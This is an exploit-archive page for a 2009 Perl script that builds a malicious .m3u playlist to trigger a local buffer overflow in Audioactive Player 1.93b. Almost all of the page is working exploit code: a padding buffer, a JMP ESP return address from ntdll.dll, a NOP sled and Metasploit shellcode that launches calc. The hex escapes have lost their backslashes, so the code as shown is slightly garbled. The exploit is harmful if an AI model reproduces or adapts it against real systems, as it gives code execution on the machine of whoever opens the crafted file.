Audioactive Player 1.93b (.m3u) Local Buffer Overflow Exploit

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : Audioactive Player 1.93b (.m3u) Local Buffer Overflow Exploit
# Published : 2009-05-15
# Author : hack4love
# Previous Title : Winamp <= 5.55 (MAKI script) Universal Integer Overflow Exploit
# Next Title : MP3 Studio 1.0 (.mpf /.m3u File) Local Stack Overflow Exploit (SEH)

#!/usr/bin/perl
# by hack4love
# hack4love@hotmail.com
# Audioactive player v1.93b (.m3u) Local buffer Overflow Exploit
# Greetz to all my friends
# From EGYPT
##################################################################
my $bof="x41" x 224;
my $ret="xedx1ex94x7c"; # JMP ESP ntdll.dll
my $nop="x90" x 24;
##################################################################
# win32_exec - EXITFUNC=seh CMD=calc Size=160 Encoder=PexFnstenvSub http://metasploit.com
my $shellcode =
"x31xc9x83xe9xdexd9xeexd9x74x24xf4x5bx81x73x13x26".
"xacxdfx53x83xebxfcxe2xf4xdax44x9bx53x26xacx54x16".
"x1ax27xa3x56x5exadx30xd8x69xb4x54x0cx06xadx34x1a".
"xadx98x54x52xc8x9dx1fxcax8ax28x1fx27x21x6dx15x5e".
"x27x6ex34xa7x1dxf8xfbx57x53x49x54x0cx02xadx34x35".
"xadxa0x94xd8x79xb0xdexb8xadxb0x54x52xcdx25x83x77".
"x22x6fxeex93x42x27x9fx63xa3x6cxa7x5fxadxecxd3xd8".
"x56xb0x72xd8x4exa4x34x5axadx2cx6fx53x26xacx54x3b".
"x1axf3xeexa5x46xfax56xabxa5x6cxa4x03x4ex5cx55x57".
"x79xc4x47xadxacxa2x88xacxc1xcfxbex3fx45xacxdfx53";
##################################################################
open(myfile,'>>hack4love.m3u');
print myfile $bof.$ret.$nop.$shellcode;
# Tested on: Windows XP Pro SP2 (EN)
##################################################################

# www.Syue.com [2009-05-15]